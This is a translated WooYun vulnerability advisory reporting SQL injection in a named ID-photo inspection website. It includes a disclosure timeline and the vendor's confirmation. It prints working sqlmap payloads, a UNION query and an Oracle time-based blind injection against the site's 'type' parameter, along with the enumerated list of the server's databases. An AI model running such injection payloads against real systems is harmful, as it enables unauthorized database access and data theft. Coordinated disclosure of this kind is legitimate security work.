Vulnerability summary

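Defect ID: wooyun-2013-034798

Vulnerability title: SQL injection vulnerability in the ID Photo Quality Inspection Center

Vendor: 太极计算机 (Taiji Computer)

Reported by: lucky

Submitted: 2013-08-20 14:57

Fixed: 2013-10-04 14:58

Published: 2013-10-04 14:58

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Vulnerability status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]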


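Vulnerability details

Disclosure status:

2013-08-20: Details reported to the vendor; awaiting vendor handling
2013-08-24: Vendor confirmed; details disclosed to the vendor only
2013-09-03: Details disclosed to core white hats and experts in related fields
2013-09-13: Details disclosed to regular white hats
2013-09-23: Details disclosed to intern white hats
2013-10-04: Details disclosed to the public

Brief description:

Detailed description: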

http://jxcrj.com/text/webtext.aspx?type=-1


---
Place: GET
Parameter: type
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: type=-1' UNION ALL SELECT CHR(58)||CHR(116)||CHR(122)||CHR(109)||CHR(58)||CHR(74)||CHR(100)||CHR(119)||CHR(102)||CHR(74)||CHR(113)||CHR(81)||CHR(67)||CHR(69)||CHR(98)||CHR(58)||CHR(104)||CHR(119)||CHR(119)||CHR(58), NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: type=-1' AND 4189=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(105)||CHR(85)||CHR(105),5) AND 'wHOL'='wHOL
---
[00:31:49] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [28]:
[*] CTXSYS
[*] HR
[*] KTHCRJ
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TJZPJC_OLD
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZPJC
[*] ZPJC_TEMP

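Proof of vulnerability:

Fix:

Copyright notice: when reposting, please credit the source lucky@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2013-08-24 22:41

Vendor reply:

Latest status:

None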

